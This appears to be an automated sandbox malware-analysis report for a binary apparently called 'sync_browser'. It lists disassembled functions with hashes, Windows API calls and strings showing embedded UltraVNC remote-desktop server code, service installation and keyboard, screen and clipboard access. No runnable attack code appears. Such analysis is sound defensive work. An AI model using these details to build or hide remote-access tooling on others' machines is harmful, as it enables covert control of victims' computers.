API ID: Message$FindPostSendSleepWindowmouse_event$CloseCreateHandleThread
String ID: blackscreen
API String ID: 1419467151-1520931032
Opcode ID: c13e5961689c7147809b67f205c06e05967d7aac8a0ba7f50e620ab93483d6c8
Instruction ID: eceaced41e8ed62512f95dc4b7ff342f40f2a435034608b09ba04ea2fc2afa3b
Opcode Fuzzy Hash: c13e5961689c7147809b67f205c06e05967d7aac8a0ba7f50e620ab93483d6c8
Instruction Fuzzy Hash: 58815E72A0D682C2FB61BB24F4406BAA690BF85784FC90535CA5D067AADF2DF540C735

Function 00007FF740031CE0 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 149COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF740031D13
LeaveCriticalSection.KERNEL32 ref: 00007FF740031F1B
InvalidateRect.USER32 ref: 00007FF740031F73
LeaveCriticalSection.KERNEL32 ref: 00007FF740031F7F

Strings

Default, xrefs: 00007FF740031CE0, 00007FF740031CE1
O, xrefs: 00007FF740031D08
vncdesktop.cpp : Shared memory mapped, xrefs: 00007FF740031F56
vncdesktop.cpp : Start Mirror driver, xrefs: 00007FF740031E33
vncdesktop.cpp : Using non driver mode, xrefs: 00007FF740031E78
vncdesktop.cpp : Driver option is enabled, xrefs: 00007FF740031D1A
vncdesktop.cpp : Start Mirror driver Failed, xrefs: 00007FF740031E63
vncdesktop.cpp : Closing pending driver driver version, xrefs: 00007FF740031D39
vncdesktop.cpp : Driver Used, xrefs: 00007FF740031F41

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$EnterInvalidateRect
String ID: Default$O$vncdesktop.cpp : Closing pending driver driver version$vncdesktop.cpp : Driver Used$vncdesktop.cpp : Driver option is enabled$vncdesktop.cpp : Shared memory mapped$vncdesktop.cpp : Start Mirror driver$vncdesktop.cpp : Start Mirror driver Failed$vncdesktop.cpp : Using non driver mode
API String ID: 3829719269-2763606790
Opcode ID: 5d513aa8406f826ec46c4d3060459385fd1a56e50c55edde39c3eb827b447b94
Instruction ID: d6e14850dae2c6b37c56c81d2c41d2b3004cae6aced4ee227123048b776b92f2
Opcode Fuzzy Hash: 5d513aa8406f826ec46c4d3060459385fd1a56e50c55edde39c3eb827b447b94
Instruction Fuzzy Hash: 74717C76A0CA82C6E755FF25D4006E9B3A4FB88F44F884432DA0D5B3A8CF38B505CB20

Function 00007FF740012D00 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 75serviceCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF740012FE0: GetModuleFileNameA.KERNEL32 ref: 00007FF740013009
Part of subcall function 00007FF740012FE0: SetCurrentDirectoryA.KERNEL32 ref: 00007FF740013041

OpenSCManagerA.ADVAPI32 ref: 00007FF740012D23
CreateServiceA.ADVAPI32 ref: 00007FF740012DB6
GetLastError.KERNEL32 ref: 00007FF740012DC4
CloseServiceHandle.ADVAPI32 ref: 00007FF740012DFB

Part of subcall function 00007FF74000A040: OpenInputDesktop.USER32(?,?,?,00007FF7400082D7), ref: 00007FF74000A07A
Part of subcall function 00007FF74000A040: GetCurrentThreadId.KERNEL32 ref: 00007FF74000A083
Part of subcall function 00007FF74000A040: GetThreadDesktop.USER32(?,?,?,00007FF7400082D7), ref: 00007FF74000A08B
Part of subcall function 00007FF74000A040: SetThreadDesktop.USER32(?,?,?,00007FF7400082D7), ref: 00007FF74000A0A6
Part of subcall function 00007FF74000A040: MessageBoxA.USER32 ref: 00007FF74000A0B7
Part of subcall function 00007FF74000A040: SetThreadDesktop.USER32(?,?,?,00007FF7400082D7), ref: 00007FF74000A0C2
Part of subcall function 00007FF74000A040: CloseDesktop.USER32(?,?,?,00007FF7400082D7), ref: 00007FF74000A0CB

Strings

uvnc_service, xrefs: 00007FF740012D5A, 00007FF740012D8E
UltraVNC, xrefs: 00007FF740012D35, 00007FF740012DE6
Tcpip, xrefs: 00007FF740012D53
Failed: Permission denied, xrefs: 00007FF740012DCF
Failed to open service control manager, xrefs: 00007FF740012D3C
Failed to create a new service, xrefs: 00007FF740012DDF

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Desktop$Thread$CloseCurrentOpenService$CreateDirectoryErrorFileHandleInputLastManagerMessageModuleName
String ID: Failed to create a new service$Failed to open service control manager$Failed: Permission denied$Tcpip$UltraVNC$uvnc_service
API String ID: 1695331641-1004021400
Opcode ID: 6415f80341d9534cb3fadac7f1d9968ed7ad466c8fff1878714631192f384662
Instruction ID: 193bbbb7ad9de8ff1b4c87fbaa28cc5bd2cd739e910b79c815294fdd103a9e68
Opcode Fuzzy Hash: 6415f80341d9534cb3fadac7f1d9968ed7ad466c8fff1878714631192f384662
Instruction Fuzzy Hash: 64314871A0CA86C6EB11BB10F8402B9A3A1FF48744F940035DA9D46B79EF7DF599CB60

Function 00007FF7400193E0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 87libraryloaderCOMMON

Download Yara Rule

APIs

EnumDisplaySettingsA.USER32 ref: 00007FF740019422
LoadLibraryA.KERNEL32 ref: 00007FF740019437
GetProcAddress.KERNEL32 ref: 00007FF74001945B
CreateDCA.GDI32 ref: 00007FF740019507
GetLastError.KERNEL32 ref: 00007FF740019510
DeleteDC.GDI32 ref: 00007FF74001951E
FreeLibrary.KERNEL32 ref: 00007FF740019537

Strings

EnumDisplayDevicesA, xrefs: 00007FF740019449
DISPLAY, xrefs: 00007FF7400194FA
USER32, xrefs: 00007FF740019428
mv video hook driver2, xrefs: 00007FF7400194C8

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Library$AddressCreateDeleteDisplayEnumErrorFreeLastLoadProcSettings
String ID: DISPLAY$EnumDisplayDevicesA$USER32$mv video hook driver2
API String ID: 1846935786-1174184736
Opcode ID: 90704b8816186510b2b91f08dfa5c235d54b69d90b2a5e6b12a0bf26ce9b4dd4
Instruction ID: df970386100ae39f27e5977382db2cb1ebf2775b7f97fb12652527b5198ff0a2
Opcode Fuzzy Hash: 90704b8816186510b2b91f08dfa5c235d54b69d90b2a5e6b12a0bf26ce9b4dd4
Instruction Fuzzy Hash: 48313025A0DA82D5EB70BB21B8547AAA3A0FF89744FC41135DA4D5776CDF3CE005C720

Function 00007FF740022650 Relevance: 18.4, APIs: 9, Strings: 3, Instructions: 431COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7400B7BF0: GetSystemTimeAsFileTime.KERNEL32(?,?,?,00007FF740053771), ref: 00007FF7400B7BFE

Part of subcall function 00007FF7400B7BAC: _getptd.LIBCMT ref: 00007FF7400B7BB4

rand.LIBCMT ref: 00007FF7400226B0

Part of subcall function 00007FF7400B7BC4: _getptd.LIBCMT ref: 00007FF7400B7BC8

rand.LIBCMT ref: 00007FF7400226B8
rand.LIBCMT ref: 00007FF7400226C4

Part of subcall function 00007FF740005490: rand.LIBCMT ref: 00007FF7400054D2
Part of subcall function 00007FF740005490: rand.LIBCMT ref: 00007FF7400054DA
Part of subcall function 00007FF740005490: rand.LIBCMT ref: 00007FF7400054E6

rand.LIBCMT ref: 00007FF7400226F0
rand.LIBCMT ref: 00007FF7400226F8
rand.LIBCMT ref: 00007FF740022704
rand.LIBCMT ref: 00007FF7400227DB
rand.LIBCMT ref: 00007FF7400227E3
rand.LIBCMT ref: 00007FF7400227EF

Strings

After DH: g=%I64u, m=%I64u, i=%I64u, key=%I64u, xrefs: 00007FF740022BD3
interKey larger than maxNum, xrefs: 00007FF7400229CA
CheckUserGroupPasswordUni result=%i, xrefs: 00007FF740022C3C

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: rand$Time_getptd$FileSystem
String ID: After DH: g=%I64u, m=%I64u, i=%I64u, key=%I64u$CheckUserGroupPasswordUni result=%i$interKey larger than maxNum
API String ID: 3485648590-3000200491
Opcode ID: a3ff226198b317dc9944d335c8f75175da97f0ba89ea36ea833236189cd01347
Instruction ID: 1aa7a12d240a0f07ea60d68f37d81fbb502ebaf75fe40f3d010e4f00ec31d679
Opcode Fuzzy Hash: a3ff226198b317dc9944d335c8f75175da97f0ba89ea36ea833236189cd01347
Instruction Fuzzy Hash: DCF11A52B1D3D58AEB11E7BA64102FDBFA09B42785F944076DF9D1BBAADD2CE100C720

Function 00007FF740003A90 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF740003AB6
LoadImageA.USER32 ref: 00007FF740003B68
GetModuleHandleA.KERNEL32 ref: 00007FF740003B7C
LoadImageA.USER32 ref: 00007FF740003B9C
CreateDCA.GDI32 ref: 00007FF740003BC5
GetDIBits.GDI32 ref: 00007FF740003BF1
DeleteDC.GDI32 ref: 00007FF740003C0E

Strings

\background.bmp, xrefs: 00007FF740003B41
DISPLAY, xrefs: 00007FF740003BA9
(, xrefs: 00007FF740003BB8

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: ImageLoadModule$BitsCreateDeleteFileHandleName
String ID: ($DISPLAY$\background.bmp
API String ID: 3125945695-1422902838
Opcode ID: 5c990643eb74fd538b6b4e7c95b6f894b66b7c2a1e2628e0d5a9c6046c92dc90
Instruction ID: 62132e9541c445a681cc4287465795d35838cc48b9bb123c6e21f3aefe8fcbe6
Opcode Fuzzy Hash: 5c990643eb74fd538b6b4e7c95b6f894b66b7c2a1e2628e0d5a9c6046c92dc90
Instruction Fuzzy Hash: 9041523561CB81C6E760AB54F85476AB3A0FB89794FC01235DA9D03BA8DF3CE1058B10

Function 00007FF7400C2C70 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 159fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

_set_error_mode.LIBCMT ref: 00007FF7400C2CB5
_set_error_mode.LIBCMT ref: 00007FF7400C2CC6
GetModuleFileNameW.KERNEL32 ref: 00007FF7400C2D28

Part of subcall function 00007FF7400C4930: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7400C49D2), ref: 00007FF7400C4948

GetStdHandle.KERNEL32 ref: 00007FF7400C2E3D
WriteFile.KERNEL32 ref: 00007FF7400C2E9A

Strings

..., xrefs: 00007FF7400C2D7A
Runtime Error!Program: , xrefs: 00007FF7400C2CF5
<program name unknown>, xrefs: 00007FF7400C2D37
Microsoft Visual C++ Runtime Library, xrefs: 00007FF7400C2DE1

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: File_set_error_mode$CurrentHandleModuleNameProcessWrite
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 2183313154-4022980321
Opcode ID: cf5eef92c392be2f681cf437b81623491fac9973547c1d005ab3661ee4ff1334
Instruction ID: 24611670bffdf17e44f0fc08c03ad2a0226c00a4221dfffa158f94c7543ca757
Opcode Fuzzy Hash: cf5eef92c392be2f681cf437b81623491fac9973547c1d005ab3661ee4ff1334
Instruction Fuzzy Hash: BD519031A1C642C2F768FB25A4116BAA291FF85784FD44135EE5D42BADCF3CF5068624

Function 00007FF740059A40 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 68registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF74000D390: GetModuleFileNameA.KERNEL32 ref: 00007FF74000D3BB

GetPrivateProfileIntA.KERNEL32 ref: 00007FF740059A92
RegOpenKeyExA.ADVAPI32 ref: 00007FF740059AC0
RegQueryValueExA.ADVAPI32 ref: 00007FF740059B0C
RegCloseKey.ADVAPI32 ref: 00007FF740059B3A
GetPrivateProfileIntA.KERNEL32 ref: 00007FF740059B75

Strings

UseRegistry, xrefs: 00007FF740059A81
admin, xrefs: 00007FF740059A88, 00007FF740059B6E
Software\ORL\WinVNC3, xrefs: 00007FF740059AAD
NewMSLogon, xrefs: 00007FF740059AFD, 00007FF740059B67

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: PrivateProfile$CloseFileModuleNameOpenQueryValue
String ID: NewMSLogon$Software\ORL\WinVNC3$UseRegistry$admin
API String ID: 771632046-3493897170
Opcode ID: 7e17a9a545862003f56dca8ab1949a50e46989200b9f0bc494998167346eab91
Instruction ID: 32d05ea7f72ca54ad8316e73cd249fa015e95e4756af7cab4ab4c912428654c6
Opcode Fuzzy Hash: 7e17a9a545862003f56dca8ab1949a50e46989200b9f0bc494998167346eab91
Instruction Fuzzy Hash: 9E311C36A1CA86C2EA60FB20F4557AAB3A0FB89744FC01135E68D42768DF3DE505CB60

Function 00007FF740026BBD Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 244COMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF74002407F
CloseDesktop.USER32 ref: 00007FF7400240C2
LeaveCriticalSection.KERNEL32 ref: 00007FF740027BAC

Part of subcall function 00007FF74002C660: GetTickCount.KERNEL32 ref: 00007FF74002C69F

Strings

vncservice.cpp : SelectDesktop , xrefs: 00007FF74002404B
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF740024060
vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF74002409A
vncclient.cpp : vncClientThread , xrefs: 00007FF740024029

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Desktop$CloseCountCriticalInputLeaveOpenSectionTick
String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 429868813-3977938048
Opcode ID: 1ce61eda1815472dcf5eec9035d10c7bcc81b982fce4800f6686f7fc95f08c9b
Instruction ID: 6315e8d52537eb80fdae593fe0430dda5d0031cec9b0e6b003acdf07b1b44da7
Opcode Fuzzy Hash: 1ce61eda1815472dcf5eec9035d10c7bcc81b982fce4800f6686f7fc95f08c9b
Instruction Fuzzy Hash: C4C1DF22A0C691C1E754BB35C4587FEA7A1EB85B84F984039DA4C477B9CF39E844CB20

Function 00007FF74001B3D0 Relevance: 14.0, APIs: 9, Instructions: 489COMMON

Download Yara Rule

APIs

CreateRectRgn.GDI32 ref: 00007FF74001B792
CreateRectRgn.GDI32 ref: 00007FF74001B7C4
CombineRgn.GDI32 ref: 00007FF74001B7E4
DeleteObject.GDI32 ref: 00007FF74001B7ED
free.LIBCMT ref: 00007FF74001B7F6
CreateRectRgn.GDI32 ref: 00007FF74001BA18
CombineRgn.GDI32 ref: 00007FF74001BA38
DeleteObject.GDI32 ref: 00007FF74001BA41
free.LIBCMT ref: 00007FF74001BA4A

Part of subcall function 00007FF7400B92A4: malloc.LIBCMT ref: 00007FF7400B92C7

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CreateRect$CombineDeleteObjectfree$malloc
String ID:
API String ID: 4067307076-0
Opcode ID: 20d05e3cb4de81eeb824483ab4ff36b23af894bb04d54c932c434dd6306be1f0
Instruction ID: 1c1397fdd5ebe08646e66e51de15fa1d9aac2377cd381e5d62891ac8584ed5ca
Opcode Fuzzy Hash: 20d05e3cb4de81eeb824483ab4ff36b23af894bb04d54c932c434dd6306be1f0
Instruction Fuzzy Hash: E422517260C6858BD724EF25E54066AFBA1F788B84F544135EA8E87B68DB3DE941CF00

Function 00007FF7400174C0 Relevance: 13.6, APIs: 9, Instructions: 102keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32 ref: 00007FF740017509
GetKeyState.USER32 ref: 00007FF740017523
GetKeyState.USER32 ref: 00007FF74001753D
GetKeyState.USER32 ref: 00007FF740017557
GetKeyState.USER32 ref: 00007FF740017571
GetKeyState.USER32 ref: 00007FF74001758B
TryEnterCriticalSection.KERNEL32 ref: 00007FF7400175D6
LeaveCriticalSection.KERNEL32 ref: 00007FF74001760F

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: State$CriticalSection$EnterLeave
String ID:
API String ID: 1138030011-0
Opcode ID: b876853db541de4715cda3d519086bd40b26c50766e7c8197b39221afb36b709
Instruction ID: 21c72c694047742ffcb7ba18ecc49d6d382abb092ba19e36f663c9e7df6576c7
Opcode Fuzzy Hash: b876853db541de4715cda3d519086bd40b26c50766e7c8197b39221afb36b709
Instruction Fuzzy Hash: 72418F26A1CA62C2F6127B25A90573AE671BF80356F810434DE9D077B89F3EF895C770

Function 00007FF7400251B7 Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 399COMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF74002407F
CloseDesktop.USER32 ref: 00007FF7400240C2

Part of subcall function 00007FF740001AE0: OpenClipboard.USER32 ref: 00007FF740001B0B

Strings

vncservice.cpp : SelectDesktop , xrefs: 00007FF74002404B
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF740024060
vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF74002409A
vncclient.cpp : vncClientThread , xrefs: 00007FF740024029

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
